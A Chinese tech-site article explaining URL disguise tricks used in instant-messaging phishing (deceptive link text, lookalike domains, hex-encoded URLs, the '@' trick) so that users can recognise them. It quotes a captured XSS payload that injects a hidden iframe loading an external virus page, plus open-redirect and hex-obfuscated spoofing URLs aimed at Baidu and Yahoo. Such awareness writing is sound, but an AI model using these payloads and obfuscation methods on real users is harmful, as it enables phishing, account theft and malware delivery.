扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
一般常见的社会工程学欺骗有:“腾X公司成立八周年之际,举行回馈活动,详情请登陆XXXX.com”,“我的老婆自拍了很多照片,你看看哪张比较漂亮,XXXXX.photo.com”,“听说同事小刘建立色情网站被抓了,新闻在这里呢,YYYYY.NEW.COM”。
这些信息也是带有很明显的欺骗性和诱惑性,不少IM用户只要一不注意就会去点击进入。一般这些地址连接的网站都是一些传播病毒的网站或者是钓鱼网站,还有一种是为了刷流量而做的网站。
不过大部分用户还是具有一定的知识和警惕的,一些比较陌生的域名或者是明显伪装的域名,用户都会察觉而导致欺骗失败。黑客而为了提高其可信度,就对其域名地址进行伪装。下面我们来讲解一下常见的域名伪装手段:
注:以下文章将域名称为URL。
1. 超级连接欺骗法。
此方法一般存在于网站,BBS,BLOG等WEB站点,在IM软件方面就没有用处了。
型如:
图中是对超级连接进行编辑的过程。文本框上写的是www.baidu.com,而实际上超级连接指向的地址却是http://www.qq.com。这个惯性思维误导在一定程度上也会欺骗了不少粗心的用户。其实我们要发现它,只需要对准超级连接时查看浏览器底部的提示,右键点击连接,选择属性来查看URL地址。
图2为查看属性,图3为浏览器底部信息。
2. 相似字符伪装法
此方法应用广泛,IM,WEB站点等都可以应用。
一般的URL的后缀有.cn/.com/.com.cn/.net/.net.cn/.org/.org.cn等等,黑客就是利用了这些差别进行误导。黑客可以通过注册一个类似的域名来进行欺骗。
型如:
腾讯网站的URL是QQ.com,那么黑客就可以通过注册一个类似的域名:QQ.cn,QQ.com.cn,qq.org.cn等等。假如没有仔细辨认的话很容易就会被误导,而且一般这类URL指向的都是伪腾讯网站程序的站点,不仔细辨认还真的会被欺骗,假如站点上是说在办活动,需要你输入QQ的号码和密码,广大用户一不小心就会被黑客盗取帐号。
还有一些更加难以辨认的,型如:www.163.com和www.l63.com(当中是小写字母L),数字1和字母l,字母O和数字0,多一个s,少一个s,加入-或者_这两个符号,重复或者少字母,把两个字母换位置等。
3. URL字符HEX转换法
经常会看到这样的QQ尾巴:“看了吗,的视频新闻,刘若英全裸演出,勇露三点!!!http://search.tom.com/s.php?w=%3C%2Ftitle%3E%22%3Ciframe+src%3D%27http%3A%2F%2F%77%65%62%2e%79%75%6c%65%74%74%2e%63%6e%2f%63%2e%68%74%6d%27+width%3D0+height%3D0%3E%3C%2Fiframe%3E+&edt=07k”这个QQ尾巴比较特殊,利用了TOM搜索的过滤漏洞{此漏洞昨晚被补上了。不好意思。无法让各位实践。}那个URL的字符进行了HEX转换。其实那个漏洞是利用TOM搜索的过程中没有对一些HTML命令进行过滤而导致跨站,它这里搜索的字符是
",其中的
http://web.yulett.c**/***.htm就是病毒网页。只要你打开了那个TOM搜索连接,也就同时打开了这个网页。(因安全缘故隐去部分地址)
以前很多大网站甚至银行都存在此类跨站漏洞,现在基本都修补完毕了。百度还有百度知道等地方也曾被利用跨站。不过最近发现百度的MP3搜索频道还是存在跨站漏洞,还未修复,本人也发现并截获了利用此漏洞的QQ尾巴蠕虫病毒,已经通知了百度的工作人员。漏洞大概会在短期内修复。型如:http://mp3.baidu.com/tring?url= http://hi.baidu.com/greysign
这个漏洞主要是打开以后会执行tring?url=后面的任意URL而导致的跨站。假如我们结合一下HEX转换,把后面部分字符转换成HEX代码。就更加隐蔽,具有迷惑性。
修改后的代码:
http://mp3.baidu.com/tring?url=%68%74%74%70%3a%2f%2f%68%69%2e%62%61%69%64%75%2e%63%6f%6d%2f%67%72%65%79%73%69%67%6e
和上面未转换的代码具有同样的效果。
4. 万能的@大法
这方法在IE7已经无效,在火狐浏览器,Opera浏览器会遭遇提示。
其他的浏览器还是默默地做了黑客的从犯。包括我们最常用到的IE6。
代码型如:http://www.baidu.com@www.qq.com
假如你在浏览器输入以上地址。你会发现打开的网站是qq.com而不是百度。相信你已经看出来了吧。域名在被浏览器解析的时候,只执行了@后面的URL,并且没有任何提示,这也就给了黑客的可趁之机,不明所以的用户又遭殃了。而且很多人即使被欺骗以后还是没有发觉出来……这也是小G将这些域名伪装手法大暴光的原因之一。
同样,我们将那个URL中@ 后面的字符进行了HEX转换来加强伪装效果。
修改后代码为:http://www.baidu.com@%77%77%77%2e%71%71%2e%63%6f%6d
不影响执行。
所以各位网友以后看到URL带@的话还要记得擦亮眼睛多看清楚地址。注:HEX是指将字符的ASCII编码进行16进制转换。例如字母a的10进制ASCII编码是97,HEX之后就是%61了。
这些伪装手段,有的利用了著名站点的跨站漏洞,有的利用.了字符的相似,用户的粗心,也有的是利用一些简单的技术手段来实现伪装。总而言之,没有绝对的安全,我们只能通过不断学习知识来保护自己的爱机了,相信你看完本文会掌握一些关于网络欺骗,钓鱼和域名伪装的相关知识。
截止至今日,百度的图片搜索跨站漏洞,百度知道跨站漏洞,MP3频道跨站漏洞已经全部修补完毕了,虽然我已经上报了好几个月,不过毕竟已经修复好了。最近流行的跨站漏洞是雅虎的:http://cn.wrs.yahoo.com/*http://www.google.com/
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者